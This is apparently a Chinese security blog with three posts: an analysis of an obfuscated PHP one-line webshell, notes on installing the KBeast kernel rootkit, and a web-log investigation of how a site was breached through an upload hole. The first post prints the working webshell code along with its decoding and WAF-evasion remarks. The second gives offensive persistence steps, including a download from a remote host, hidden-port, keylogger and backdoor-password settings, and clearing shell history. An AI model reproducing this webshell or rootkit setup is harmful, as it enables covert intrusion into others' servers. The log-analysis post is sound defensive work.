一个寄生虫一句话木马分析

最近朋友站被频繁挂马、暂未找到寄生虫的寄生位置,貌似是着急处理把寄生虫清理了,没有备份,以前见过一次没有分析,也是各种绕,里面发现了一个一句话木马,真是奇葩、源代码如下:

<?php
function cve($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
    $k=(($i+2)/2)%strlen($key);
    $p=substr($key, $k,1);
    if(is_numeric(substr($str, $i,1)))
    {
        $t=$t.chr(hexdec(substr($str, $i,2))-$p);
    }
    else
    {
        $t=$t.chr(hexdec(substr($str, $i,4)));
        $i=$i+2;
    }
}
return($t);
}

(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
?>

只有想不到的算法,没有做不到的一句话啊,变形一句话现在几百个至少了吧,混合起来估计至少要上千个变异版本,核心的估计也就几百个吧,调试了下一句话的使用,如下:

<?php
function cve($str,$key)
{
$t="";
echo $str.">>".$key."<br>";
for($i=0; $i<strlen($str); $i=$i+2)
{   echo $i." while ";//这里是循环次数
    $k=(($i+2)/2)%strlen($key);
    echo " ---- ".$k; //这里经过上面算法处理后的,本次(i+2/2)%(字符串长度)
    $p=substr($key, $k,1); //取key变量从$k开始,返回1个字符
    echo " ---- ".$p; //
    if(is_numeric(substr($str, $i,1)))//如果$str字符串在$i的位置返回是数字的话
    {
        $t=$t.chr(hexdec(substr($str, $i,2))-$p);
        echo $t." >>>>>>yes int"."<br>";//$str字符串在$i位置开始返回2个字符转化为10进制数字,然后减去上面的$p,用chr返回对应的ASCII码值
    }
    else
    {
        $t=$t.chr(hexdec(substr($str, $i,4)));
        $i=$i+2;
        echo $t." >>>>>>is no int"."<br>";//如果if判断的不是数字的话走这里,这里和上面一样区别是从$i位置开始返回4个字符并给$i+2,走到这个流程的话每次是4
    }
}
echo $t." >>>>>>return>>>>>>".$t."<br>";
return($t);
}

(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
//(@$_=assert).@$_(eval(base64_decode($_POST['z0']))); //第一次解密
//assert(eval(base64_decode($_POST['z0']))); //第二次解密

//发现是base64编码的变形马
echo "<br>".base64_encode("phpinfo();")."<br>"; //cGhwaW5mbygpOw==
//只要post发请求 z0=cGhwaW5mbygpOw== 即可使用了这个木马了
//不过这个木马觉得使用者应该会用跳板去中转base64编码,这样一个达到了跳板隐藏的作用,另一个用base64编码桡骨waf
?>

跑起来后运行结果如下:

6A767C687B77>>39
0 while —- 1 —- 9a >>>>>>yes int
2 while —- 0 —- 3as >>>>>>yes int
4 while —- 1 —- 9ass >>>>>>yes int
6 while —- 0 —- 3asse >>>>>>yes int
8 while —- 1 —- 9asser >>>>>>yes int
10 while —- 0 —- 3assert >>>>>>yes int
assert >>>>>>return>>>>>>assert
6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E>>520
0 while —- 1 —- 2e >>>>>>yes int
2 while —- 2 —- 0ev >>>>>>yes int
4 while —- 0 —- 5eva >>>>>>yes int
6 while —- 1 —- 2eval >>>>>>yes int
8 while —- 2 —- 0eval( >>>>>>yes int
10 while —- 0 —- 5eval(b >>>>>>yes int
12 while —- 1 —- 2eval(ba >>>>>>yes int
14 while —- 2 —- 0eval(bas >>>>>>yes int
16 while —- 0 —- 5eval(base >>>>>>yes int
18 while —- 1 —- 2eval(base6 >>>>>>yes int
20 while —- 2 —- 0eval(base64 >>>>>>yes int
22 while —- 0 —- 5eval(base64_ >>>>>>yes int
24 while —- 1 —- 2eval(base64_d >>>>>>yes int
26 while —- 2 —- 0eval(base64_de >>>>>>yes int
28 while —- 0 —- 5eval(base64_dec >>>>>>yes int
30 while —- 1 —- 2eval(base64_deco >>>>>>yes int
32 while —- 2 —- 0eval(base64_decod >>>>>>yes int
34 while —- 0 —- 5eval(base64_decode >>>>>>yes int
36 while —- 1 —- 2eval(base64_decode( >>>>>>yes int
38 while —- 2 —- 0eval(base64_decode($ >>>>>>yes int
40 while —- 0 —- 5eval(base64_decode($_ >>>>>>yes int
42 while —- 1 —- 2eval(base64_decode($_P >>>>>>yes int
44 while —- 2 —- 0eval(base64_decode($_PO >>>>>>yes int
46 while —- 0 —- 5eval(base64_decode($_POS >>>>>>yes int
48 while —- 1 —- 2eval(base64_decode($_POST >>>>>>yes int
50 while —- 2 —- 0eval(base64_decode($_POST[ >>>>>>yes int
52 while —- 0 —- 5eval(base64_decode($_POST[‘ >>>>>>yes int
54 while —- 1 —- 2eval(base64_decode($_POST[‘z >>>>>>yes int
56 while —- 2 —- 0eval(base64_decode($_POST[‘z0 >>>>>>yes int
58 while —- 0 —- 5eval(base64_decode($_POST[‘z0’ >>>>>>yes int
60 while —- 1 —- 2eval(base64_decode($_POST[‘z0’] >>>>>>yes int
62 while —- 2 —- 0eval(base64_decode($_POST[‘z0’]) >>>>>>yes int
64 while —- 0 —- 5eval(base64_decode($_POST[‘z0’])) >>>>>>yes int
eval(base64_decode($_POST[‘z0’])) >>>>>>return>>>>>>eval(base64_decode($_POST[‘z0’]))

擦,这算法,怎么想到的,再变个函数又一个变形版会诞生,起码这个安全狗可杀了,阿里云的云盾不行,查不到都…

rootkit 变种 试用笔记

很多时候反弹shell还是不太方便,需要一个外网IP,要么自己有路由器的权限,做内网映射,而且用自己家的ip是不太稳定的,如果没有权限,总不能arp欺骗吧,如果有路由器权限还可以用花生壳做映射。都不是完美的解决方案,应该直接写入后门,不用做反向连接是比较好的,反弹shell的话,有可能会拥有添加账户的权限,也可以去尝试,如果不能的话,只能维持后门了,听说roobkit特别强大,就花时间研究了下,网上都写的不细,实际中成功的机会不大、

开始是用的kbeast,看了网上写的参数介绍不太全,在这里补全一下:
首先下载、解压、进入目录、编辑配置文件:
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
tar zxvf ipsecs-kbeast-v1.tar.gz
cd kbeast-v1/
vim config.h

#使用键盘记录可能不稳定,推荐开启
define _KEYLOG_ TRUE

#定义守护进程的名字
define KBEAST “sheller”

#定义程序路径,防止被误删或者查杀
define _H4X_PATH_ “/usr/rootkit”

#会在这个路径保存日志,必须使用_h4x_路径
define _H4X_PATH_ “/usr/_h4x_”

#此处产生的日志文件是隐藏的
define _LOGFILE_ “access_log”

#监听的端口,netstat命令查不到,不过可以用nmap外部扫描到噢、
define _HIDE_PORT_ 55555

#配置用户名和密码
define _RPASSWORD_ “hacker”
define _MAGIC_NAME_ “root” #用户名要有bash权限

然后安装:./setup build 会出现 Compiling Kernel Module : [NOT OK] 的错误,尝试安装了kernel-headers、kernel、kernel-dev,都是不行,会爆Checking for Kernel Header : [NOT OK] – Please Install!这个错误。
看了下是正常的:echo? linux-headers-$(uname -r)
看一下我的内核是 uname -r?? 2.6.18 ,貌似写不进去,kernel是内核级roobkit、、
然后就history? -c,找了suterusu:https://github.com/mncoppola/suterusu,尝试编译也是不行;
再后来,不行就先用个应用版的吧,去找国内知名的向日葵去了。下载下来都是.so编译的动态库,没有介绍的run.sh,官网的电脑板远程控制直接打不开,暂时放弃了吧。先用脚本反弹shell用着吧,以后继续留意rootkit、
第一种 kbeast 在一些linux下估计还适用,可以写入内核,然后就可以用nc或telnet链接啦、、、

一次WEB日志的反渗透分析

某次某客户网站中了后门,后门路径为:/home/wwwroot/default/Public/Uploadify/demo.php, demo.php是典型的一句话webshell,他是怎么上传到网站的呢?原因很多,可能是系统漏洞,提权上传的,这样的话直接用rootkit好了,没必要留个一句话后门,首先这种想法就排除了,另外就是可能因为弱口令或者上传漏洞等WEB漏洞上传的,这种可能性是最大的,如果通过渗透测试找到这个漏洞的话,会花很大的时间和精力,还有可以反渗透,理论上来讲反渗透肯定是可以查到缘故的,但是有时反渗透往往查不到,甚至很复杂,需要间接的去查也是有可能的。这次选择了反渗透查写入webshell的原因。

下载好日志access.log最近30天的日志,webshell的时间只可以借鉴,可以修改webshell时间的,不能以webshell时间为准。开始看了最近一个周的日志,没找到缘故,于是找了最近一个月的日志,才有眉目了。

//在日志中搜索demo.php发现有35个地方,都有demo.php

138.128.212.179 – – [16/Jul/2016:00:23:00 +0800] “GET /Public/js/demo.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//通过这里看到,实际中的webshell地址不是这个,继续找下一个demo.php访问日志,

138.128.212.179 – – [16/Jul/2016:00:21:06 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 404 1331 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0″

//找到这条了,这条日志是攻击者在访问webshell的日志,但是webshell返回404,说明这个文件不存在,可能是攻击者在测试是否成功写入webshell了。

//再次重新搜索?demo.php HTTP/1.1” 200 这样是webshell没有被删除的时候,找到21次访问记录,根据ip看下攻击者的轨迹(IP:138.128.212.179)
138.128.212.179 – – [12/Jul/2016:19:02:18 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0” //Public/uploadify.php文件不存在 404
138.128.212.179 – – [12/Jul/2016:19:02:22 +0800] “GET /Public/uploadf.php HTTP/1.1” 200 13 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0” ?//Public/uploadif.php文件存在 200
138.128.212.179 – – [12/Jul/2016:19:02:26 +0800] “GET /Public/ HTTP/1.1” 403 273 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:31 +0800] “GET /Uploads/ HTTP/1.1” 403 274 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:36 +0800] “GET /Uploads/Pic/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:39 +0800] “GET /Uploads/ HTTP/1.1” 403 274 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:41 +0800] “GET / HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:41 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:42 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//貌似找到/Public/uploadify.php这个上传文件了哦,攻击者在找上传目录;

138.128.212.179 – – [14/Jul/2016:18:41:14 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:16 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:16 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:18 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:19 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:21 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:21 +0800] “GET /1.log HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:23 +0800] “GET /public/upimg.htm?and+1=1+and+”=’ HTTP/1.1″ 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:23 +0800] “GET /public/upimg.htm HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:24 +0800] “GET /Public/upimg.htm HTTP/1.1” 200 744 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:24 +0800] “GET /public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:25 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:28 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:28 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:31 +0800] “GET /ajax.php HTTP/1.1” 200 54 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:32 +0800] “GET /Home/Login/loginadmin HTTP/1.1” 200 948 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:32 +0800] “GET /phpMyAdmin/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:34 +0800] “GET /pm/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:35 +0800] “GET /phpinfo.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:35 +0800] “GET /Bak_data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /Public/UEditor/ueditor.all.js HTTP/1.1” 404 162 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /Data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:37 +0800] “GET /db/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:37 +0800] “GET /Db/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:38 +0800] “GET /iProber.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:38 +0800] “GET /Public/3mz.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:39 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:39 +0800] “GET /Public/main1.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:40 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”

//上面日志为攻击者在用python脚本扫描,木发现扫出什么敏感信息

138.128.212.179 – – [14/Jul/2016:18:52:21 +0800] “GET /User/Runtime/Logs/Home/16_07_14.log HTTP/1.1” 200 535770 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//这条信息是有用的,当thinkphp开启调试模式,记录日志时,默认会在这个目录下创建日志文件,而日志文件名为年_月_日,可以把日志下载下来,这里日志已经被攻击者下载了。下载看了下,是一份错误日志。

138.128.212.179 – – [14/Jul/2016:18:52:50 +0800] “GET /User/Runtime/Logs/Home/16_07_13.log HTTP/1.1” 200 429903 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:52:58 +0800] “GET /User/Runtime/Logs/Home/16_07_12.log HTTP/1.1” 200 27181 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:53:05 +0800] “GET /User/Runtime/Logs/Home/16_07_11.log HTTP/1.1” 200 452102 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:53:20 +0800] “GET /User/Runtime/Logs/Home/16_07_10.log HTTP/1.1” 200 431381 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:54:56 +0800] “GET /User/Runtime/Logs/Home/16_07_09.log HTTP/1.1” 200 433395 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:16 +0800] “GET /User/Runtime/Logs/Home/16_07_08.log HTTP/1.1” 200 462788 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:23 +0800] “GET /User/Runtime/Logs/Home/16_07_07.log HTTP/1.1” 200 433154 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:27 +0800] “GET /User/Runtime/Logs/Home/16_07_06.log HTTP/1.1” 200 441394 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:30 +0800] “GET /User/Runtime/Logs/Home/16_07_05.log HTTP/1.1” 200 459486 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:46 +0800] “GET /User/Runtime/Logs/Home/16_07_04.log HTTP/1.1” 200 664894 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:57:04 +0800] “GET /User/Runtime/Logs/Home/16_07_03.log HTTP/1.1” 200 1438415 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:04 +0800] “GET /User/Runtime/Logs/Home/16_07_02.log HTTP/1.1” 200 1966718 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:31 +0800] “GET /User/Runtime/Logs/Home/16_07_01.log HTTP/1.1” 200 428610 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:36 +0800] “GET /User/Runtime/Logs/Home/16_06_30.log HTTP/1.1” 200 522384 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:37 +0800] “GET /User/Runtime/Logs/Home/16_06_29.log HTTP/1.1” 200 77195 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:38 +0800] “GET /User/Runtime/Logs/Home/16_06_28.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:38 +0800] “GET /User/Runtime/Logs/Home/16_06_27.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:39 +0800] “GET /User/Runtime/Logs/Home/16_06_26.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:39 +0800] “GET /User/Runtime/Logs/Home/16_06_25.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:01:02:53 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:54 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:56 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:56 +0800] “GET /1.log HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:57 +0800] “GET /public/upimg.htm?and+1=1+and+”=’ HTTP/1.1″ 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:57 +0800] “GET /public/upimg.htm HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /Public/upimg.htm HTTP/1.1” 200 744 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:59 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:59 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:00 +0800] “GET /ajax.php HTTP/1.1” 200 54 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:00 +0800] “GET /Home/Login/loginadmin HTTP/1.1” 200 948 “-” “python-requests/2.10.0”
223.104.91.228 – – [15/Jul/2016:01:03:00 +0800] “POST /Home/Index/tgbzcl HTTP/1.1” 200 86 “http://www.slbvip.com/Home/Index/home1” “Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.15.793 Mobile”
138.128.212.179 – – [15/Jul/2016:01:03:01 +0800] “GET /phpMyAdmin/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:01 +0800] “GET /pm/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:02 +0800] “GET /phpinfo.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:02 +0800] “GET /Bak_data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
//看到这里都是python脚本在扫描,只扫描出了错误日志,其他的没有用的信息;

138.128.212.179 – – [15/Jul/2016:17:21:34 +0800] “GET /favicon.ico HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:21:55 +0800] “POST /Home/Common/uploadFace HTTP/1.1″ 200 59 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:22:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 51 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 119 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:27 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 115 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:33 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 1526 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:36 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 112 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:45 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 1037 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:00 +0800] “GET /Public/uploadifiy.php HTTP/1.1” 200 0 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:23:21 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 748 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 420 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:26 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 250 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:34 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:35 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 290 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:41 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:48 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:49 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 785 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//通过上面来看?/Home/Common/uploadFace 方法存在一个任意文件上传漏洞;攻击者在这里上传的文件,post访问都为200,不存在应该是返回404状态的;

138.128.212.179 – – [15/Jul/2016:17:24:36 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 119 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:40 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:43 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 112 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:51 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 110 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:53 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 13 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:59 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 254 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

